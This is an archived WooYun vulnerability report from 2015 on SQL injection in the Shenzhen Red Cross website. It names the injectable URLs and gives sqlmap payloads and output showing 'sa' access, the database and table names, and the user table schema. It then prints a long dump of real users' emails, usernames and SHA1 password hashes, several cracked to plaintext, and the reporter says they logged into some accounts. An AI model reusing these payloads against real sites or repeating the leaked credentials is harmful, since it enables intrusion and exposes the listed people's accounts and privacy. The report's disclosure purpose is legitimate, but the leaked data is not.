乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-23: 细节已通知厂商并且等待厂商处理中 2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开
RT
深圳红十字会注入漏洞,爆出数据库 泄露网站重要信息。。。注入链接1:http://www.szredcross.org.cn/Intro/Memorabilia.aspx?typeID=19注入链接2:http://www.szredcross.org.cn/Intro/MemorabiliaInfo.aspx?typeID=19检测发现是 SA 权限。。。。废话少说,直接上代码吧。。
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: typeID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: typeID=19 AND 4930=4930 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: typeID=19 AND 5745=CONVERT(INT,(CHAR(58) CHAR(116) CHAR(110) CHAR(108) CHAR(58) (SELECT (CASE WHEN (5745=5745) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(120) CHAR(106) CHAR(58))) Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: typeID=19 AND 9653=(SELECT COUNT(*) FROM sysusers AS sys1,sysusersAS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: typeID=(SELECT CHAR(58) CHAR(116) CHAR(110) CHAR(108) CHAR(58) (SELECT (CASE WHEN (1227=1227) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103)CHAR(120) CHAR(106) CHAR(58))---[17:11:11] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[17:11:11] [INFO] fetching database names[17:11:11] [INFO] the SQL query used returns 6 entries[17:11:11] [INFO] retrieved: master[17:11:11] [INFO] retrieved: model[17:11:11] [INFO] retrieved: msdb[17:11:12] [INFO] retrieved: RedCrossWeb[17:11:12] [INFO] retrieved: tempdb[17:11:12] [INFO] retrieved: WebStateavailable databases [6]:[*] master[*] model[*] msdb[*] RedCrossWeb[*] tempdb[*] WebState---[17:11:40] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[17:11:40] [INFO] fetching current user[17:11:40] [INFO] retrieved: sacurrent user: 'sa'[17:11:40] [WARNING] HTTP error codes detected during run:---[17:11:46] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[17:11:46] [INFO] fetching current database[17:11:47] [INFO] retrieved: RedCrossWebcurrent database: 'RedCrossWeb'[17:11:47] [WARNING] HTTP error codes detected during run:Database: RedCrossWeb[117 tables]+----------------------------------------+| CurrencyTypeInfo || DataInfo || DataInfoList_VW || DataType || DiseasesList || DonationProject || DonationSearch || DonationSearchHistory || ExtendType || FUNDTEMP || GrassrootsDynamicInfo || GrassrootsInfo || H_WebMedicalUnitInfo || HospitalUserList_VW || Log || NewsContent || NewsContentViewList_VW || NewsContent_VW || NewsModule || NewsRelation || NewsType || OrganizationDetailInfo || OrganizationInfo || P_Bulletin || P_Bulletin_VW || P_FAQ || P_FAQType || P_Flash || P_FriendLink || P_Leaveword || P_LeavewordType || P_Leaveword_Type_VW || P_LoveList || P_ServiceNote || PolicyInfo || PolicyTypeInfo || ProvinceInfo || RDIntroduceContent || RDIntroduceType || RDProduceContent || RDProduceType || SYS_Module || SYS_ModuleAuditingRelation || SYS_Module_Rights || SYS_OperateLog || SYS_Roles || SYS_UserInfo || SYS_UserLoginInfo || SYS_UserType || SYS_User_Role || SYS_WebColorControl || S_Module || S_ProvinceInfo || Sys_Dictionary || Sys_FlowPic || Sys_PicFlash || Sys_SystemControl || Sys_ThemePicture || V_ActivityRecord || V_ActivityServiceType_VW || V_ApplyBackout || V_EmailDeliveryList || V_EmailReceiveList || V_JoinTeamsOfVolunteer_VW || V_Membership || V_PayMoney || V_ServcieAreaRelation || V_ServiceArea || V_ServiceTeamExtend || V_ServiceTeam_VW || V_ServiceTime || V_ServiceTimeRelation || V_ServiceType || V_ServiceTypeRelation || V_ServiceType_VW || V_ServicesTeam || V_Topic || V_TopicReppy || V_UserInfoVolExtendServiceTeamInfo2_VW || V_UserInfoVolExtendServiceTeamInfo_VW || V_UserInfoVolExtendServiceTeam_VW || V_UserServiceTeamExtend || V_VolExt_TeamApply_VW || V_VolExt_UserPayMoney_VW || V_VolExt_User_VW || V_VolExt_VolAcRe_VW || V_VolTopic_LeaveWord_VW || V_VolTopic_ReplyDetail_VW || V_VolTopic_Reply_VW || V_Vol_Activity_VW || V_Vol_MainTeamCount_VW || V_Vol_MyActivity_VW || V_VolunteerActivity || V_VolunteerActivityObject || V_VolunteerActivityRelation || V_VolunteerActivity_VW || V_VolunteerAppAudit_VW || V_VolunteerBloodType || V_VolunteerInfo || V_VolunteerInfo_Extend_ServiceTeam_VW || V_VolunteerOfTeam_VW || V_VolunteerRole || V_VolunteerRoleRelation || V_VolunteerRoleRelation_VW || V_VolunteerServiceTeamExtend || V_VolunteerTeamRelation || V_Volunteer_Extend || Vol_Team_subTeam_VW || WebLocalSearch_VW || Web_StudentInfo || X5_X5520 || X_4858 || X_6637 || X_7457 || X_8062 || comd_list || foofoofoo |+----------------------------------------+Database: RedCrossWebTable: SYS_UserInfo[17 columns]+--------------+----------+| Column | Type |+--------------+----------+| Answer | varchar || BoolDisable | bit || Contment | varchar || CreateDate | datetime || Email | varchar || Gender | bit || ID | int || NickName | varchar || Phone | varchar || Question | varchar || RelationID | int || UnitAddress | varchar || UnitContact | varchar || UnitName | varchar || UserName | varchar || UserPassword | varchar || UserType | int |+--------------+----------+
证明如下。。。
尝试登陆一些用户的账号 发现确实是可以登陆的。。。
以下是一些数据。。。。
[238 entries]+---------+----------------------+------------+------------------------------------------------------+| Phone | Email | UserName | UserPassword |+---------+----------------------+------------+------------------------------------------------------+| <blank> | [email protected] | Zdp103019 | 79A38DC37362D8B1CC4108B72B8D85A2D216635B (Zdp103019) || <blank> | [email protected] | 张艳华 | 384D9BF25A1FB84330A4B04698AA82A93A2608C9 || <blank> | [email protected] | 李靓 | 2B1D998790E5A8AB1CCCB29BADFCB6E6563E9441 || NULL | [email protected] | 姐妹花 | 4F6F2488DF1FA113601E66C909AABFDED0DFC03D || <blank> | [email protected] | qazcgm | 6BD8515D94DBD72D9EA3F773DB1B2FA4636565A9 || <blank> | [email protected] | 红艳 | 03943410C73D3668F9DC712310AED5F263ECDF08 || <blank> | [email protected] | 阿牛22 | 58A792F9B77D765EC2B081F1AFAF31D2C9888BF6 || <blank> | [email protected] | 小帆 | 7C4A8D09CA3762AF61E59520943DC26494F8941B (123456) || <blank> | [email protected] | 朱萍 | 2E9548F8F5CB4549A2AFF70F0C67D1B9285E0804 || <blank> | [email protected] | 118023046 | 7C4A8D09CA3762AF61E59520943DC26494F8941B (123456) || NULL | [email protected] | liaoyuping | 59B51D2FB7AAFC3F202C343ED6142534FC200610 || <blank> | [email protected] | Hx0607 | 82C784325D448B58EEEDE7A73D626ACFDB817615 || NULL | [email protected] | shiny | 0E143FC480E6C0EBE6B2776344BEBCE5FA3A4E60 || <blank> | [email protected] | coolxudan | 4F901A5E3330CD898061661B9592F37E294DEE9D || <blank> | [email protected] | 123479 | B92EBDE3DE68DE0E0F073B834C0DC95C0EB4EB17 || NULL | [email protected] | 光绪 | 32E6C5C2AD23DB90AC331BD7A4995A9F50D1F892 (airplane) || <blank> | [email protected] | 植瑞能 | 2435FFE718B1A45742F70673AE202EA0524BB5E0 (135246) || <blank> | [email protected] | hugh.liu | 122834722A488B65D692AB34DBE141C84E41CCC2 || NULL | [email protected] | 林献凤 | 2F2A496DF03CF96577A624B8DD927C89E5DED8C2 || <blank> | [email protected] | xujing | 7C4A8D09CA3762AF61E59520943DC26494F8941B (123456) || NULL | [email protected] | pop9100 | 871EA75839F0B37C14C8145233CBD607F8B713F7 || NULL | 135101305872139.com | sophia | 354DFF88F64FA3FCD1A20B202A4CC9632F1F0804 || <blank> | [email protected] | Grand0807 | 876A40737C28D55805BD0216A6F51B5768F24533 || NULL | [email protected] | 吴春玲 | 432112063FDF408D53771BA616EB418E5CA2A215 || NULL | [email protected] | 倪贵 | 6982DAE8BB04F3A02CB59E1040A0475AF146FE2F || <blank> | [email protected] | SZLIN9 | CADF3996635D675859D1ED9BCE0939CB4497226E || NULL | [email protected] | miaoxin | C83B7A89C1B63E42216E0FAFC337CF1C4B41C9FD || NULL | [email protected] | simon67 | 157A13139EF2832A53E43C050F33DADCA13C7B1A || <blank> | [email protected] | evilHC | 7C4A8D09CA3762AF61E59520943DC26494F8941B (123456) || <blank> | [email protected] | 阿童木晨 | 7A09D00AF686FF70C6307F4A452B390F0C53D45A || <blank> | [email protected] | 王春萍 | 98328D4A786532B21B3C9634B5C252F89AB5B353 || <blank> | [email protected] | 耿良华 | 1675F0843189A2DFF0771AC8F0264845B0CDAE91 (963852) || <blank> | [email protected] | 任晓晓 | AD340E907B3721000F232D9A0E73976FAB5EAE01 || NULL | [email protected] | ayan | 7AEB245805829B59BC764C09C61E14A74CB79FD0 || <blank> | [email protected] | 榴莲的刺 | 8049E70C9383AB35C71E7D88D2672562F4420B7A || <blank> | [email protected] | 可可23 | 515470A0558419BD88335CD32934BE54D336F28A (110110) || NULL | [email protected] | 付佳 | 70E235AF252B18655F2B71D4F26BB22E33FB7128 || NULL | [email protected] | Kikyo | EC1D122DD1509A41116208199A49AB398DE8D5B4 || NULL | [email protected] | Delores | 367353E3E42ABB67AF1D5C6A086DBC5E31A951A5 || <blank> | [email protected] | yinyiqi | 57CA8012BD98FAEB0BF8AEAD244809C988854F90 || NULL | [email protected] | 碧海蓝天 | A1BAA202D18E63F0D93CD23DE11A1B53CD36E301 || <blank> | [email protected] | 钟武腾 | 5825FE421FDC0B9CF34BC7D5CE5F53AB975B3944 || <blank> | [email protected] | ay581234 | F18F057EA44A945A083A00E6FCC11637D186042D (456123) || NULL | [email protected] | 文静chen | 405A780DA971BF6A362979528474D3955E420FEE || <blank> | [email protected] | hhp750117 | 2CA31148E6C2F9E76AE352102BC36D9E20AE850F || <blank> | [email protected] | 花雅 | 522C68A00B5E4089FDF3DACAE6EC4B861F74C1D7 || NULL | 1600032400@[email protected] | 庄燕君 | 94627FE8BFE78EE5857842104D9137E84EB0FEDD || NULL | [email protected] | 袁欢 | F733C907EB63FCC935CAE9CE373072CF74E9E442 || <blank> | [email protected] | carina88 | 48058E0C99BF7D689CE71C360699A14CE2F99774 (121212) || <blank> | [email protected] | Ally | 05A1E3CDD1A116E05BC2371D7553D5C364FFD0E1 || <blank> | [email protected] | 文殊 | A411A662114F350569D7C1424106A7DBB9A2D90B || <blank> | [email protected] | 王鸿林 | 69F2CB5BE0B9CF0DBE700F28621FE6AA4F68FAC9 || <blank> | [email protected] | 田木果 | B24CBE58B66B5EB9D8ADDB2EE993C512BC2940A1 || NULL | [email protected] | hhzyzdmj | 7AC5F19D5D201B20577FAB551A3510B1747619C3 (hhzyzdmj) || NULL | [email protected] | zhangdong | 9AD3E7F4CB911165859D6948AD7769DC78BDDAB7 || NULL | [email protected] | w4zhaoqi | 80B030C5F4B691B2E9011E125FDB2E54D31AF1B8 || <blank> | [email protected] | 赖满坚 | DCCA011A167D62BD5A4298E39A62F675DF7EFBC3 || <blank> | [email protected] | 杨秋英 | 4998D91CB44BC720EE822CEE4AAB746BD81FA7D7 || NULL | 1870082585@QQ。COM | 潇潇547 | 135FFEBD5D58A5D6560B597F3099DC570627DEDD || <blank> | [email protected] | zyn8754 | 77546C06D0EFD486C35F0E9581F2C04F93C7E146 || NULL | [email protected] | 王晓宾 | 6B6462507714AA02CAE433AF2C9A929FB889EAD2 || <blank> | [email protected] | kingyuki | BBFF7CD730AF07DE97C2980AED803FB44C60DC98 || <blank> | [email protected] | 么么 | E3DBC12591685BD444D5D7643802DE51EFDD94CB || <blank> | [email protected] | sunny | 3BFF695CA772A197A5FBDA4591C12C0909D12FB4 || <blank> | [email protected] | 2032055962 | 46000D45016E21C7A00710339DBCBEE4AF26C42D (orange12) || <blank> | [email protected] | 韩燕 | 5514EB38654C4352B2F74578388CE31EEE6FE2A1 || <blank> | [email protected] | ntbebe | 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8 (password) || <blank> | [email protected] | piscesheep | 0D58E460E7F6B33EBBD17CE6494D172021A45B3C || <blank> | [email protected] | 张丽华 | D85EE08D34FE5B030A98EC3FA7581EA4B6D54049 || <blank> | [email protected] | tina128 | 878298BEFF2707FD1E74A163C1120BE39DC85D58 || <blank> | [email protected] | ting1212 | 24F4682D9958EEEFA176E768058DDF3F90AD9AB5 || NULL | [email protected] | 吴小虫 | 3482930BBF4BB4542B702373C2678EC51EB8FF5B || <blank> | [email protected] | 木易 | 56AB859EE2888D33461495C09B5169E2B555EEE7 || <blank> | [email protected] | only | CE9A89CE905F538109AAD8386801599C6776B64B || <blank> | [email protected] | 龙骑士 | A3A9D34FB9FCA4B00BFE81DC580AD8D9B0A45613 || <blank> | [email protected] | nantaiyouj | BF70C55B46E0D3C19DA41A92A3AC2B5B9F2BAC39 (221989) || <blank> | [email protected] | 小白 | 3242A7A94FC42C8D95ED0EBC92E2075F48A4983C || NULL | [email protected] | T\\?b7沁雪 | 639B9E52EBE61DDABC4387233B0D68CA91CB5F18 || NULL | [email protected] | 沐寒而开 | 5CE528CBF630CBF7C35DF80F755F3B3D54E7A819 || <blank> | [email protected] | ZRYAN | C5AAD17F083CA09D9EE8FB930643FEE8B1CA24C4 || NULL | [email protected] | xiaoeagle | 458ED342DC54BCB419D9721138D2D0203EB80951 || NULL | [email protected] | helenchow | 34E1455E6FFC68092067CA8E560AFD1A5EDD48E4 || <blank> | [email protected] | 志愿者2012 | 7C4A8D09CA3762AF61E59520943DC26494F8941B (123456) || NULL | [email protected] | Alina | 32F84B95F0962C5807386FD0A8EC98D374B8983D (090909) || NULL | [email protected] | luyuqiu6 | 0F29FC19D7336476001BDF515C162974B7C2C527 || <blank> | [email protected] | 吴亚林 | 9134B86BD526E19B880E7C3496D517A15F1B3886 || NULL | [email protected] | 刘永 | 2628AF34C15D7F7F94FCD30B4C853AAF5B1FE8B9 || <blank> | [email protected] | yeoh1990 | 237010568618F9C7D677E85D58CD361F5C60C190 (635200) || <blank> | [email protected] | 童飞丽 | 39B768723B804B445AF8B1F9E80320EC494424A8 || <blank> | [email protected] | 亮仕达 | BA3784F65D96D63192A32155DD969719FE63D730 (198425) || NULL | [email protected] | 289852647 | D30AFD521506D7D66C4A0954CC3948F16791EB05 (asdzxc) || NULL | [email protected] | missok2006 | 24E45834201C45C2DAA5445C762D992E99812A3C (198419) || <blank> | [email protected] | 罗宇民 | D423DFFCB971CEA78CCA2F429DE91784281EECF6 || <blank> | [email protected] | summer | 79AE096DD55F92D2C814205AEC6078E5FA4B7026 || <blank> | [email protected] | celineee | 2DBFAC57E2ADE919E3E69C6B130A1B892BAF49DD || <blank> | [email protected] | 小寅 | 6A66068844F668CAB1C640A95A87A31A02B80E5A || <blank> | [email protected] | 326673511 | FFD33FD6F381DA8870804A16F1F937072F0AEE05 || NULL | [email protected] | 深圳联羽球会 | 5DFF8D7119E40568B3ED529BB19FB12A29391911 |
6666.。。。
你们知道。。。
危害等级:无影响厂商忽略
忽略时间:2015-06-28 16:34
暂无
